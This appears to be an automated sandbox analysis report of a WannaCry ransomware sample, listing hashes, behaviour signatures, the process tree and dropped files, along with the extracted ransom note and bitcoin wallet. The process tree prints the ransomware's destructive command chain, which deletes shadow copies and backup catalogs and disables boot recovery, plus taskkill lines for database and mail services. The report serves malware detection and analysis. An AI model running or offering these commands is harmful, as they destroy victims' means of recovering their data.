Analysis

  • max time kernel
    148s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-06-2024 14:55

General

  • Target

    WannaCry.exe

  • Size

    224KB

  • MD5

    5c7fb0927db37372da25f270708103a2

  • SHA1

    120ed9279d85cbfa56e5b7779ffa7162074f7a29

  • SHA256

    be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

  • SHA512

    a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

  • SSDEEP

    3072:Y059femWRwTs/dbelj0X8/j84pcRXPlU3Upt3or4H84lK8PtpLzLsR/EfcZ:+5RwTs/dSXj84mRXPemxdBlPvLzLeZ

Malware Config

Extracted

Path

C:\Users\Admin\Documents\!Please Read Me!.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files?
A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting!
Q: What do I do?
A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1
Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.)
rar password: wcry123
Run and follow the instructions!
Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 52 IoCs
  • Suspicious use of SendNotifyMessage 51 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\WannaCry.exe
    "C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1044
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c 155841718895357.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1296
      • C:\Windows\SysWOW64\cscript.exe
        cscript //nologo c.vbs
        3⤵
        • Loads dropped DLL
        PID:2796
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe f
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:2628
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im MSExchange*
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2060
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Microsoft.Exchange.*
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2020
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im sqlserver.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2108
    • C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im sqlwriter.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1284
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe c
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1628
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b !WannaDecryptor!.exe v
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1268
      • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
        !WannaDecryptor!.exe v
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1312
          • C:\Windows\SysWOW64\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2112
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1088
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe
      2⤵
      • Executes dropped EXE
      • Sets desktop wallpaper using registry
      • Suspicious use of SetWindowsHookEx
      PID:620
    • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
      !WannaDecryptor!.exe
      2⤵
      • Executes dropped EXE
      • Sets desktop wallpaper using registry
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:892
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1264
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:1756
  • C:\Windows\explorer.exe
    "C:\Windows\explorer.exe"
    1⤵
      PID:928
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\!Please Read Me!.txt
      1⤵
        PID:2224

Network

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe

        Filesize

        236KB

        MD5

        cf1416074cd7791ab80a18f9e7e219d9

        SHA1

        276d2ec82c518d887a8a3608e51c56fa28716ded

        SHA256

        78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

        SHA512

        0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

      • C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk

        Filesize

        921B

        MD5

        f7733d44e2671a1486aab012ac401a7f

        SHA1

        35ac14aeb4c34addc148bdafdb1f161a7e412b66

        SHA256

        b9fdfa36924c4db8395c1f7598f5d6dc2f455861c784584861cc05bbc7980d5a

        SHA512

        8b286d6a536cbe2ed7cc45b06306e6c1025a91ff66aef1f3ccaf838d7e8a5977be6807648b30d52c17e5b3206ee7ba9a228aac84f33d11811a432f8a08aab846

      • C:\Users\Admin\AppData\Local\Temp\00000000.res

        Filesize

        136B

        MD5

        30223b381ded3f8b6c8e69fd7741ab99

        SHA1

        32eba9906a44668f89e99dc47671dcaa6578d1d9

        SHA256

        40ce271080b23c3a4f39d1d187636814d66a23a41b4b6e63be1d3448a01722b4

        SHA512

        89a6ff25378ed5beaa32d727456750f9d51e0d453d5a899050a2acb7f409a8186bb12525a3b5bccf7b893827ca0ef57f61ea12bcd2069eb4949a8229d72be19d

      • C:\Users\Admin\AppData\Local\Temp\00000000.res

        Filesize

        136B

        MD5

        d89df611d36950c494b94b9d3f7c20e5

        SHA1

        97517e18075721e5b977ba5b68f1c6c2206f0271

        SHA256

        994afa58380a97c05ed3b33c5453fb0c43048fc1ea60fafc5ce8b3ea0226cb33

        SHA512

        919f67b8a06e702fb0fbbbaf8bca3919577de40be3c8e14e91de8a93bf343d9571bca2dfa83aaf961d7f1af6a5b7b6525d477e14c863bf41ea1eb0e830c302e6

      • C:\Users\Admin\AppData\Local\Temp\00000000.res

        Filesize

        136B

        MD5

        f8a3cc61e6e83e777aaf6c181eacfa54

        SHA1

        5e4182de2d1d2da73700ecdefc0e24c9de2579e1

        SHA256

        d8255c6949cb14311d5425c90c92f0051d83be1ec665ccb1b603c036358224c9

        SHA512

        313ce84e96ec5ba079dcd347092afa4760f8adaa0561390c72762417b52baa2720dbc6e5889a15d53681525c8756fe39629e3246a6f11cc44c48d8d65d5231b0

      • C:\Users\Admin\AppData\Local\Temp\00000000.res

        Filesize

        136B

        MD5

        e5b2b4fa17de567998d4c20f82adea53

        SHA1

        dba3a50f4c6eb4d961f01ceb9a4b37f94a528314

        SHA256

        3f980f26c7595c87c6f633ff1f1b05a9fef0c49ae94c57d8b519d4b9b7f68236

        SHA512

        4a349b3c74fed89f2569a806923f7af955f01fed96d145e3f1cbad3f4097881b01e0a50f175fa84ffd75e61575c1387c8e96cccf769ee7e48ded0b7353e6d96c

      • C:\Users\Admin\AppData\Local\Temp\155841718895357.bat

        Filesize

        336B

        MD5

        3540e056349c6972905dc9706cd49418

        SHA1

        492c20442d34d45a6d6790c720349b11ec591cde

        SHA256

        73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc

        SHA512

        c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

      • C:\Users\Admin\AppData\Local\Temp\c.vbs

        Filesize

        219B

        MD5

        5f6d40ca3c34b470113ed04d06a88ff4

        SHA1

        50629e7211ae43e32060686d6be17ebd492fd7aa

        SHA256

        0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1

        SHA512

        4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

      • C:\Users\Admin\AppData\Local\Temp\c.wry

        Filesize

        628B

        MD5

        8202a5c09e9dd992c8e8b7d0db62095a

        SHA1

        62e01072de268ecd6413b422c0eb4aa7546f61ae

        SHA256

        40649d17b2c5bf5bc2b499369258394651e7f9525366e97959692f4fd57a3e6a

        SHA512

        980019e725a05e3cabb26a7595a713464fa8325afa2482e0b85614815e2da008d6afe0ce9c7c4f2da0c6c3b3fb26cfc7125f90b7dc546d5195a25e179153eec4

      • C:\Users\Admin\AppData\Local\Temp\f.wry

        Filesize

        44B

        MD5

        7d36759693a88e998b131f05c778111c

        SHA1

        5d1e16571d59ec0194e1064761d8c7344bea908f

        SHA256

        e8409af301247bde396c77399bf1bd5d15b6edbb9b5ea35e4b7185a7962f387a

        SHA512

        d768cbf99d51f2393a785f67f853d406aa3c527fb57f701a64ea58195f9d752d13b6a821bf177b692528a8e30d264b575ff53594438253558b7b8a9f0a5d252c

      • C:\Users\Admin\AppData\Local\Temp\m.wry

        Filesize

        42KB

        MD5

        980b08bac152aff3f9b0136b616affa5

        SHA1

        2a9c9601ea038f790cc29379c79407356a3d25a3

        SHA256

        402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

        SHA512

        100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

      • C:\Users\Admin\Desktop\SendUnlock.gif.WCRY

        Filesize

        515KB

        MD5

        4e0ab79b63f8b3181955991909bccfff

        SHA1

        a021793be879045fb346088425ca58acddf340f8

        SHA256

        3d524f344fee5e3cb8acaf225e8fe545edef7b850acc2f45b2fcd557c11c50b9

        SHA512

        41e7524cae25bf7bf7a6d32c6a5c98a0999412730ee187dad4854677ad46c116c32511fafe0f3b246b29e536750ce3d1b5a3a67199f3ee339f1e154bf3981793

      • C:\Users\Admin\Documents\!Please Read Me!.txt

        Filesize

        797B

        MD5

        afa18cf4aa2660392111763fb93a8c3d

        SHA1

        c219a3654a5f41ce535a09f2a188a464c3f5baf5

        SHA256

        227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

        SHA512

        4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

      • memory/1044-6-0x0000000010000000-0x0000000010012000-memory.dmp

        Filesize

        72KB

      • memory/1756-808-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

      • memory/1756-812-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

      • memory/1756-809-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB